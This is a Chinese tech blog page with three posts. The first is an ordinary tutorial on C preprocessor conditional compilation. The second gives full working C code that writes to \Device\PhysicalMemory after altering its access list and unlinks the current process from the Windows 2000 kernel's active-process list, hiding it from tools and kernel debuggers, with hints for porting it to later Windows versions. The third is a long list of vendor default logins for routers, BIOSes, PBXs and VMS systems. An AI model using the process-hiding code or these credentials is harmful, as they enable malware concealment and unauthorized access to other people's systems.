Sguy's Tech Home

C++编程中的宏应用

    一般情况下，源程序中所有的行都参加编译。但是有时希望对其中一部分内容只在满足一定条件才进行编译，也就是对一部分内容指定编译的条件，这就是“条件编译”。有时，希望当满足某条件时对一组语句进行编译，而当条件不满足时则编译另一组语句。
    条件编译命令最常见的形式为：
    #ifdef 标识符
    程序段1
    #else
    程序段2
    #endif
    
    它的作用是：当标识符已经被定义过(一般是用#define命令定义)，则对程序段1进行编译，否则编译程序段2。
    其中#else部分也可以没有，即：
    #ifdef
    程序段1
    #denif
    
    这里的“程序段”可以是语句组，也可以是命令行。这种条件编译可以提高C源程序的通用性。如果一个C源程序在不同计算机系统上系统上运行，而不同的计算机又有一定的差异。例如，我们有一个数据类型，在Windows平台中，应该使用long类型表示，而在其他平台应该使用float表示，这样往往需要对源程序作必要的修改，这就降低了程序的通用性。可以用以下的条件编译：
    #ifdef WINDOWS
    #define MYTYPE long
    #else
    #define MYTYPE float
    #endif
    
    如果在Windows上编译程序，则可以在程序的开始加上
    #define WINDOWS
    
    这样则编译下面的命令行：
    #define MYTYPE long
    
    如果在这组条件编译命令之前曾出现以下命令行：
    #define WINDOWS 0
    
    则预编译后程序中的MYTYPE都用float代替。这样，源程序可以不必作任何修改就可以用于不同类型的计算机系统。当然以上介绍的只是一种简单的情况，可以根据此思路设计出其它的条件编译。
    例如，在调试程序时，常常希望输出一些所需的信息，而在调试完成后不再输出这些信息。可以在源程序中插入以下的条件编译段：
    #ifdef DEBUG
    print ("device_open(%p)\n", file);
    #endif
    
    如果在它的前面有以下命令行：
    #define DEBUG
    
    则在程序运行时输出file指针的值，以便调试分析。调试完成后只需将这个define命令行删除即可。有人可能觉得不用条件编译也可达此目的，即在调试时加一批printf语句，调试后一一将printf语句删除去。的确，这是可以的。但是，当调试时加的printf语句比较多时，修改的工作量是很大的。用条件编译，则不必一一删改printf语句，只需删除前面的一条“#define DEBUG”命令即可，这时所有的用DEBUG作标识符的条件编译段都使其中的printf语句不起作用，即起统一控制的作用，如同一个“开关”一样。
    有时也采用下面的形式：
    #ifndef 标识符
    程序段1
    #else
    程序段2
    #endif
    
    只是第一行与第一种形式不同：将“ifdef”改为“ifndef”。它的作用是：若标识符未被定义则编译程序段1，否则编译程序段2。这种形式与第一种形式的作用相反。
    以上两种形式用法差不多，根据需要任选一种，视方便而定。
    还有一种形式，就是#if后面的是一个表达式，而不是一个简单的标识符：
    #if 表达式
    程序段1
    #else
    程序段2
    #endif
    
    它的作用是：当指定的表达式值为真（非零）时就编译程序段1，否则编译程序段2。可以事先给定一定条件，使程序在不同的条件下执行不同的功能。
    例如：输入一行字母字符，根据需要设置条件编译，使之能将字母全改为大写输出，或全改为小写字母输出。
    #define LETTER 1
    main()
    {
    char str[20]="C Language",c;
    int i=0;
    while((c=str[i])!='\0'){
    i++;
    #if LETTER
    if(c>='a'&&c<='z') c=c-32;
    #else
    if(c>='A'&&c<='Z') c=c+32;
    #endif
    printf("%c",c);
    }
    }
    
    运行结果为：C LANGUAGE
    现在先定义LETTER为1，这样在预处理条件编译命令时，由于LETTER为真（非零），则对第一个if语句进行编译，运行时使小写字母变大写。如果将程序第一行改为：
    #define LETTER 0
    
    则在预处理时，对第二个if语句进行编译处理，使大写字母变成小写字母（大写字母与相应的小写字母的ASCII代码差32）。此时运行情况为：
    c language
    有人会问：不用条件编译命令而直接用if语句也能达到要求，用条件编译命令有什么好处呢？的确，此问题完全可以不用条件编译处理，但那样做目标程序长（因为所有语句都编译），而采用条件编译，可以减少被编译的语句，从而减少目标的长度。当条件编译段比较多时，目标程序长度可以大大减少。

发表于 @ 2006年07月11日 12:27 PM | 评论 (0)

Win2000下进程隐藏的一种方案

      十分抱歉，匆匆写了几句代码有点bug，即“ZwOpenSection(&g_hMPM,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&attributes)”使得第一次运行返回失败，请删除原文．

　　上次在CVC提到了这东西，因为很简单觉得没必要多说什么，但有人要求写全，所以补充几句：

　　很多帖子对此论题作了分析，比如APIHOOK、系统服务HOOK等等，至于远线程注入没有自己的进程，本不算“隐藏”。

　　这里写一个2000下的完全隐藏方法，很简单，也没什么新意。

　　在讲解之前，首先提一提一些结构，进程执行体块中有数个进程相关链，其中之一是活动进程链。此链的重要
作用之一就是在查询系统信息时供遍历当前活动进程，很有意思的是M$可能因效率因素使它被排除出进程核心块，
意味进线程切换等操作时并不利用它，进一步说改写它也不该有不可忽视的问题（此即本方案的基础）。

　　怎么做很明显了，在活动进程双向链中删除想要得隐藏的进程既可，核心调试器（如softice/proc）亦查不出来。

　　2000下的隐藏当前进程的代码如下：

#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

#define NT_SUCCESS(Status)      ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH    ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
  NTSTATUS  Status;
  ULONG    Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
  USHORT    Length;
  USHORT    MaximumLength;
  PWSTR    Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT       0x00000002L
#define OBJ_PERMANENT      0x00000010L
#define OBJ_EXCLUSIVE      0x00000020L
#define OBJ_CASE_INSENSITIVE  0x00000040L
#define OBJ_OPENIF       0x00000080L
#define OBJ_OPENLINK      0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES  0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
  ULONG    Length;
  HANDLE    RootDirectory;
  PUNICODE_STRING ObjectName;
  ULONG    Attributes;
  PVOID    SecurityDescriptor;
  PVOID    SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
            OUT PHANDLE SectionHandle,
            IN ACCESS_MASK DesiredAccess,
            IN POBJECT_ATTRIBUTES ObjectAttributes
            );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(        
             IN OUT PUNICODE_STRING DestinationString,
             IN PCWSTR SourceString
             );

RTLINITUNICODESTRING    RtlInitUnicodeString;
ZWOPENSECTION      ZwOpenSection;
HMODULE  g_hNtDLL = NULL;
PVOID   g_pMapPhysicalMemory = NULL;
HANDLE   g_hMPM   = NULL;

BOOL InitNTDLL()
{
  g_hNtDLL = LoadLibrary( "ntdll.dll" );
  if ( !g_hNtDLL )
  {
    return FALSE;
  }

  RtlInitUnicodeString =
    (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
  
  ZwOpenSection =
    (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
  
  return TRUE;
}

VOID CloseNTDLL()
{
  if(g_hNtDLL != NULL)
  {
    FreeLibrary(g_hNtDLL);
  }
}

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
  
  PACL pDacl=NULL;
  PACL pNewDacl=NULL;
  PSECURITY_DESCRIPTOR pSD=NULL;
  DWORD dwRes;
  EXPLICIT_ACCESS ea;
  
  if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
    NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
  ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions = SECTION_MAP_WRITE;
  ea.grfAccessMode = GRANT_ACCESS;
  ea.grfInheritance= NO_INHERITANCE;
  ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
  ea.Trustee.ptstrName = "CURRENT_USER";
  
  
  if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
  if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
  {
    goto CleanUp;
  }
  
CleanUp:
  
  if(pSD)
    LocalFree(pSD);
  if(pNewDacl)
    LocalFree(pNewDacl);
}

HANDLE OpenPhysicalMemory()
{
  NTSTATUS    status;
  UNICODE_STRING    physmemString;
  OBJECT_ATTRIBUTES  attributes;
  
  RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
  
  attributes.Length      = sizeof(OBJECT_ATTRIBUTES);
  attributes.RootDirectory    = NULL;
  attributes.ObjectName      = &physmemString;
  attributes.Attributes      = 0;
  attributes.SecurityDescriptor    = NULL;
  attributes.SecurityQualityOfService  = NULL;
  
  status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  
  if(status == STATUS_ACCESS_DENIED){
    status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

  if( !NT_SUCCESS( status ))
  {
    return NULL;
  }
  
  g_pMapPhysicalMemory = MapViewOfFile(
    g_hMPM,
    4,
    0,
    0x30000,
    0x1000);
  if( g_pMapPhysicalMemory == NULL )
  {
    return NULL;
  }
  
  return g_hMPM;
}

PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
  ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
  PGDE=BaseAddress[VAddr>>22];
  if ((PGDE&1)!=0)
  {
    ULONG tmp=PGDE&0x00000080;
    if (tmp!=0)
    {
      PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
    }
    else
    {
      PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
      PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
      if ((PTE&1)!=0)
      {
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
      }
      else return 0;
    }
  }
  else return 0;

  return (PVOID)PAddr;
}

ULONG GetData(PVOID addr)
{
  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
  if (tmp==0)
    return 0;
  ULONG ret=tmp[(phys & 0xFFF)>>2];
  UnmapViewOfFile(tmp);
  return ret;
}

BOOL SetData(PVOID addr,ULONG data)
{
  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
  if (tmp==0)
    return FALSE;
  tmp[(phys & 0xFFF)>>2]=data;
  UnmapViewOfFile(tmp);
  return TRUE;
}

BOOL HideProcessAtAll()
{
  if (InitNTDLL())
  {
    if (OpenPhysicalMemory()==0)
    {
      return FALSE;
    }
    ULONG thread=GetData((PVOID)0xFFDFF124);
    ULONG process=GetData(PVOID(thread+0x22c));
    ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4));
    SetData(PVOID(fw+4),bw);
    SetData(PVOID(bw),fw);
    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();
  }
  return TRUE;
}

　　调用HideProcessAtAll即隐藏当前进程，如若一运行就隐藏，会修改到进程活动链表头，运行一段时间后可能出现些小问题，怎么解决，留作“课后习题”了^_^

　　注意默认物理地址0x30000为一页目录，在大多数情况时这样，但是是有例外的！怎么解决亦留作“...”吧，不多废话了。

　　稍微改一下偏移可移植于NT/XP/2003。
 
 
 

发表于 @ 2006年04月15日 7:00 PM | 评论 (0)

路由器默认密码

制造商 产品 型号 登陆方式 用户名 密码 权限 附注
=======================================================
3COM CellPlex 7000 Telnet tech tech
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet
3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech
3COM HiPerARC v4.1.x Telnet adm (none)
3COM LANplex 2500 Telnet debug synnet
3COM LANplex 2500 Telnet tech tech
3COM LinkSwitch 2000/2700 Telnet tech tech
3COM NetBuilder SNMP ANYCOM snmp-read
3COM NetBuilder SNMP ILMI snmp-read
3COM Office Connect ISDN Routers 5x0 Telnet n/a PASSWORD Admin
3COM SuperStack II Switch 2200 Telnet debug synnet
3COM SuperStack II Switch 2700 Telnet tech tech
3COM Telnet adm (none)
3COM Telnet admin synnet
3COM Telnet manager manager
3COM Telnet monitor monitor
3COM Telnet read synnet
3COM Telnet security security
3COM Telnet write synnet
3COM AirConnect Access Point 01.50-01 Multi n/a (none) Admin
3com OfficeConnect 812 ADSL Multi adminttd adminttd Admin
3com router Multi n/a (none) Admin
3com hub Multi n/a (none) Admin
3com Wireless AP ANY Multi admin comcomcom Admin Works on all 3com wireless APs
3COM LinkBuilder Telnet n/a (none) Admin
3COM CellPlex 7000 Telnet tech tech User
3com cellplex 7000 Telnet admin admin Admin
3com super stack II Console n/a (none) Admin
Accelerated Networks DSL CPE and DSLAM Telnet sysadm anicust
ADC Kentrox Pacesetter Router Telnet n/a secret
Adtran MX2800 Telnet n/a adtran
Advanced Integration PC BIOS Console n/a Advance Admin
Alcatel PBX 4400 Port 2533 kermit kermit unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 dhs3mt dhs3mt unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 at4400 at4400 unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 mtch mtch unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 mtcl mtcl unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 root letacla unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 dhs3pms dhs3pms unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 adfexc adfexc unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 client client unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 install llatsni unknown thanks to Nicolas Gregoire
Alcatel PBX 4400 Port 2533 halt tlah unknown thanks to Nicolas Gregoire
Allied Telesyn Multi manager friend Admin
allied CJ8MO E-U Telnet (none) (none) Admin
Allied Telesyn Multi secoff secoff Admin
Allied Telesyn Switch AT-8124XL 1.0.3 Multi admin (none) Admin By Nicolas Gregoire
Alteon ACEDirector3 console admin (none)
Alteon ACEswitch 180e HTTP admin admin Admin
Alteon ACEswitch 180e Telnet admin (none)
AMI PC BIOS Console n/a amipswd Admin
AMI PC BIOS Console n/a AMISETUP Admin
AMI PC BIOS Console n/a BIOSPASS Admin
AMI PC BIOS Console n/a HEWITT RAND Admin
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_SW Admin
AMI PC BIOS Console n/a AMI?SW Admin
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KEY Admin
AMI PC BIOS Console n/a AMI.KEZ Admin
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a AMIAMI Admin
AMI PC BIOS Console n/a AMIDECOD Admin
AMI PC BIOS Console n/a AMIPSWD Admin
Amptron PC BIOS Console n/a Polrty Admin
Asante IntraSwitch multi IntraSwitch Asante Admin
Asante IntraStack multi IntraStack Asante Admin
Ascend Yurie Multi readonly lucenttech2
Ascend Router Telnet n/a ascend Admin
Ascend Sahara Multi root ascend
Ascend Yurie Multi readwrite lucenttech1
AST PC BIOS Console n/a SnuFG5 Admin
ast powerexec 4/25sl Multi n/a (none) Admin
AT&T 3B2 Firmware Console n/a mcp Admin
Autodesk Autocad Multi autocad autocad User
Avaya Definity G3Si Multi craft (none) Admin
AVAYA g3R v6 Console root ROOT500 Admin
Avaya Definity G3Si Multi craft (none) Admin
Avaya Cajun Pxxx Multi root root Admin
AWARD PC BIOS Console n/a CONCAT Admin
AWARD PC BIOS Console n/a condo Admin
AWARD PC BIOS Console n/a CONDO Admin
AWARD PC BIOS Console n/a g6PJ Admin
AWARD PC BIOS Console n/a h6BB Admin
AWARD PC BIOS Console n/a HELGA-S Admin
AWARD PC BIOS Console n/a HEWITT RAND Admin
AWARD PC BIOS Console n/a HLT Admin
AWARD PC BIOS Console n/a j09F Admin
AWARD PC BIOS Console n/a j322 Admin
AWARD PC BIOS Console n/a j64 Admin
AWARD PC BIOS Console n/a lkw peter Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a PASSWORD Admin
AWARD PC BIOS Console n/a SER Admin
AWARD PC BIOS Console n/a setup Admin
AWARD PC BIOS Console n/a SKY_FOX Admin
AWARD PC BIOS Console n/a SWITCHES_SW Admin
AWARD PC BIOS Console n/a Sxyz Admin
AWARD PC BIOS Console n/a SZYX Admin
AWARD PC BIOS Console n/a t0ch20x Admin
AWARD PC BIOS Console n/a t0ch88 Admin
AWARD PC BIOS Console n/a TTPTHA Admin
AWARD PC BIOS Console n/a TzqF Admin
AWARD PC BIOS Console n/a wodj Admin
AWARD PC BIOS Console n/a zbaaaca Admin
AWARD PC BIOS Console n/a Award Admin
AWARD PC BIOS Console n/a AWARD_SW Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a LKWPETER Admin
AWARD PC BIOS Console n/a j262 Admin
AWARD PC BIOS Console n/a j256 Admin
AWARD PC BIOS Console n/a ?award Admin
AWARD PC BIOS Console n/a 01322222 Admin
AWARD v4.51PG v4.51PG Multi n/a SY_MB Admin It is useful and tested
AWARD PC BIOS Console n/a 256256 Admin
AWARD PC BIOS Console n/a admin Admin
AWARD PC BIOS Console n/a alfarome Admin
AWARD PC BIOS Console n/a aLLy Admin
AWARD PC BIOS Console n/a aPAf Admin
AWARD PC BIOS Console n/a award Admin
AWARD PC BIOS Console n/a awkward Admin
AWARD PC BIOS Console n/a BIOS Admin
AWARD PC BIOS Console n/a biosstar Admin
AWARD PC BIOS Console n/a biostar Admin
Axis NETCAM 200/240 Telnet root pass Admin
Bay Networks Switch 350T Telnet n/a NetICs Admin
Bay Networks SuperStack II Telnet security security Admin
Bay Networks Router Telnet User (none) User
Bay Networks Router Telnet Manager (none) Admin
BEA WebLogic https system weblogic Admin allow configuration of X509 certificates (Nicolas Gregoire)
Bintec Bianka Routers Multi admin bintec Admin
Biostar PC BIOS Console n/a Biostar Admin
Biostar PC BIOS Console n/a Q54arwms Admin
boson router simulator 3.66 Multi n/a (none) Admin
boson router simulator 3.66 Multi n/a (none) Admin
Breezecom Breezecom Adapters 3.x n/a Master Admin
Breezecom Breezecom Adapters 4.x n/a Super Admin
Breezecom Breezecom Adapters 2.x n/a laflaf Admin
Brother NC-3100h (none) access network board access
Brother NC-4100h (none) access network board access
Brother HL-1270n Multi n/a access network board access
Cabletron Netgear modem/router and SSR netman (none) Admin
Cabletron routers & switches (none) (none)
Cayman Cayman DSL n/a (none) Admin
Cayman Cayman DSL 3220-H } (none) Admin
Cisco IOS 12.1(3) SNMP n/a cable-docsis SNMP read-write might run on many Ciscos
Cisco IOS 11.x-12.x SNMP n/a ILMI limited READ/WRITE
Cisco CiscoWorks 2000 admin cisco Admin
Cisco CiscoWorks 2000 guest (none) User
CISCO Cache Engine Console admin diamond Admin
Cisco ConfigMaker cmaker cmaker Admin
Cisco IOS Multi cisco cisco
Cisco IOS Multi enable cisco IOS technically has no default pw
cisco cva 122 Telnet admin admin Admin
Cisco IOS 2600 series Multi n/a c but these are common misconfigurations
Cisco CNR All CNR GUI admin changeme Admin This is the default password for Cisco Network Registrar
Cisco IOS Multi n/a cc
Cisco IOS Multi n/a cisco
Cisco IOS Multi n/a Cisco router
Cisco Netranger/secure IDS Multi netrangr attack
Cisco-Arrowpoint Arrowpoint admin system Admin
Compaq PC BIOS Console n/a Compaq Admin
Compaq Insight Manager administrator administrator Admin
Compaq Insight Manager anonymous (none) User
Compaq Insight Manager user user User
Compaq Insight Manager operator operator
Compaq Insight Manager user public User
Compaq Insight Manager PFCUser 240653C9467E45 User
Computer Associates ControlIT ControlIT DEFAULT default Desktop/console access
Concord PC BIOS n/a last Admin
Crystalview OutsideView 32 Crystal Admin
CTX International PC BIOS Console n/a CTX_123 Admin
CyberMax PC BIOS Console n/a Congress Admin
D-Link hubs/switches Telnet D-Link D-Link
D-Link Cable/DSL Routers/Switches Multi (none) admin Admin Model: DI-704/DI-704P
Daewoo PC BIOS Console n/a Daewuu Admin
Dallas Semiconductors TINI embedded JAVA Module <= 1.0 Telnet root tini Admin
Datacom BSASX/101 n/a letmein Admin
Datawizard.net FTPXQ server FTP anonymous any@ read/write on c:\
Daytek PC BIOS Console n/a Daytec Admin
decnet decnet Multi operator admin Guest
Dell Latitude Bios D35B Multi n/a 1RRWTTOOI Admin
Dell CSr500xt Multi n/a admin Admin
dell inspiron Multi n/a admin Admin
Dell PC BIOS Console n/a Dell Admin
Demarc Network Monitor multi admin my_DEMARC Admin
Develcon Orbitor Default Console n/a BRIDGE Admin
Develcon Orbitor Default Console n/a password Admin
Dictaphone ProLog PBX PBX
Dictaphone ProLog NETWORK NETWORK
Dictaphone ProLog NETOP (none)
Digicorp Viper Telnet n/a BRIDGE Admin
Digicorp Viper Telnet n/a password Admin
Digital Equipment VMS Multi DEFAULT USER
Digital Equipment VMS Multi DEFAULT DEFAULT
Digital Equipment VMS Multi DEMO DEMO
Digital Equipment VMS Multi FIELD FIELD
Digital Equipment VMS Multi FIELD SERVICE
Digital Equipment VMS Multi FIELD TEST
Digital Equipment VMS Multi FIELD DIGITAL
Digital Equipment VMS Multi GUEST GUEST
Digital Equipment VMS Multi HELP HELP
Digital Equipment VMS Multi HELPDESK HELPDESK
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi HOST HOST
Digital Equipment VMS Multi INFO INFO
Digital Equipment VMS Multi INGRES INGRES
Digital Equipment VMS Multi LINK LINK
Digital Equipment VMS Multi MAILER MAILER
Digital Equipment VMS Multi MBMANAGER MBMANAGER
Digital Equipment VMS Multi MBWATCH MBWATCH
Digital Equipment VMS Multi NETCON NETCON
Digital Equipment VMS Multi NETMGR NETMGR
Digital Equipment VMS Multi NETNONPRIV NETNONPRIV
Digital Equipment VMS Multi NETPRIV NETPRIV
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETSERVER NETSERVER
Digital Equipment VMS Multi NETWORK NETWORK
Digital Equipment VMS Multi NEWINGRES NEWINGRES
Digital Equipment VMS Multi NEWS NEWS
Digital Equipment VMS Multi OPERVAX OPERVAX
Digital Equipment VMS Multi POSTMASTER POSTMASTER
Digital Equipment VMS Multi PRIV PRIV
Digital Equipment VMS Multi REPORT REPORT
Digital Equipment VMS Multi RJE RJE
Digital Equipment VMS Multi STUDENT STUDENT
Digital Equipment VMS Multi SYS SYS
Digital Equipment VMS Multi SYSMAINT SYSMAINT
Digital Equipment VMS Multi SYSMAINT SERVICE
Digital Equipment VMS Multi SYSMAINT DIGITAL
Digital Equipment VMS Multi SYSTEM SYSTEM
Digital Equipment VMS Multi SYSTEM MANAGER
Digital Equipment VMS Multi SYSTEM OPERATOR
Digital Equipment VMS Multi SYSTEM SYSLIB
Digital Equipment VMS Multi SYSTEST UETP
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST_CLIG
Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST
Digital Equipment VMS Multi TELEDEMO TELEDEMO
Digital Equipment VMS Multi TEST TEST
Digital Equipment VMS Multi UETP UETP
Digital Equipment VMS Multi USER PASSWORD
Digital Equipment VMS Multi USERP USERP
Digital Equipment VMS Multi VAX VAX
Digital Equipment VMS Multi VMS VMS
Digital Equipment DEC-10 Multi 1 syslib Admin
Digital Equipment DEC-10 Multi 1 operator Admin
Digital Equipment DEC-10 Multi 1 manager Admin
Digital Equipment DEC-10 Multi 2 maintain Admin
Digital Equipment DEC-10 Multi 2 syslib Admin
Digital Equipment DEC-10 Multi 2 manager Admin
Digital Equipment DEC-10 Multi 2 operator Admin
Digital Equipment DEC-10 Multi 30 games User
Digital Equipment DEC-10 Multi 5 games User
Digital Equipment DEC-10 Multi 7 maintain User
Digital Equipment DecServer Multi n/a ACCESS Admin
Digital Equipment DecServer Multi n/a SYSTEM Admin
Digital Equipment IRIS Multi accounting accounting Admin
Digital Equipment IRIS Multi boss boss Admin
Digital Equipment IRIS Multi demo demo User
Digital Equipment IRIS Multi manager manager Admin
Digital Equipment IRIS Multi PDP11 PDP11 User
Digital Equipment IRIS Multi PDP8 PDP8 User
Digital Equipment IRIS Multi software software User
Digital Equipment PC BIOS Console n/a komprie Admin
Digital Equipment RSX Multi 1.1 SYSTEM Admin
Digital Equipment RSX Multi BATCH BATCH User
Digital Equipment RSX Multi SYSTEM MANAGER Admin
Digital Equipment RSX Multi SYSTEM SYSTEM Admin
Digital Equipment RSX Multi USER USER User
Digital Equipment Terminal Server Port 7000 n/a access User
Digital Equipment Terminal Server Port 7000 n/a system Admin
Digital Equipment VMS Multi ALLIN1 ALLIN1
Digital Equipment VMS Multi ALLIN1MAIL ALLIN1MAIL
Digital Equipment VMS Multi ALLINONE ALLINONE
Digital Equipment VMS Multi BACKUP BACKUP
Digital Equipment VMS Multi DCL DCL
Digital Equipment VMS Multi DECMAIL DECMAIL
Digital Equipment VMS Multi DECNET DECNET
Digital Equipment VMS Multi DECNET NONPRIV
Digital Equipment VMS Multi DECNET DECNET
Dynix Library Systems Dynix Multi SETUP (none) Admin
Dynix Library Systems Dynix Multi LIBRARY (none) User
Dynix Library Systems Dynix Multi circ User
Efficient Speedstream DSL Telnet n/a admin Admin
Efficient Networks Speedstream 5711 Teledanmark version (only .dk) Console n/a 4getme2 Admin for all your TDC router needs
Efficient Networks EN 5861 Telnet login admin Admin
Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a cisco Admin
Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a (none) Admin
enCAD XPO Multi n/a (none) Admin
Enox PC BIOS Console n/a xo11nE Admin
Epox PC BIOS Console n/a central Admin
Ericsson Ericsson Acc netman netman
ericsson md110 pabx up-to-bc9 Multi (none) help varies depending on config minimal list access by default
Extreme Networks Switches admin (none) Admin
Extreme Networks Swithces Multi admin (none) Admin submitted by Eastman Rivai
Extreme Networks Swithces Multi admin (none) Admin
Extreme Networks All Switches Multi admin (none) Admin Submitted by Eastman Rivai
Flowpoint 2200 SDSL Telnet admin admin Admin
Flowpoint DSL 2000 Telnet admin admin Admin
Flowpoint DSL Telnet n/a password Admin Installed by Covad
Flowpoint Flowpoint/2000 ADSL Telnet n/a (none) Admin
Flowpoint 100 IDSN Telnet admin admin Admin
Flowpoint 40 IDSL Telnet admin admin Admin
Freetech PC BIOS Console n/a Posterie Admin
Galacticomm Major BBS Multi Sysop Sysop Admin
glFtpD glFtpD all Console glftpd glftpd Admin
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP187
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP189
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP196
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR INTX3
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR NETBASE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR REGO
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR RJE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CONV
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR DISC
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYSTEM
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi PCUSER SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi R**CMON SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi SPOOLMAN HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi WP HPOFFICE
Hewlett-Packard Vectra Console n/a hewlpack Admin
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HPOFFICE DATA
Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HP
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MGR
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SERVICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MANAGER
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPP187 SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD LOTUS
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPWORD PUB
Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPONLY
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MANAGER.SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MGR.SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO FIELD.SUPPORT
Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO OP.OPERATOR
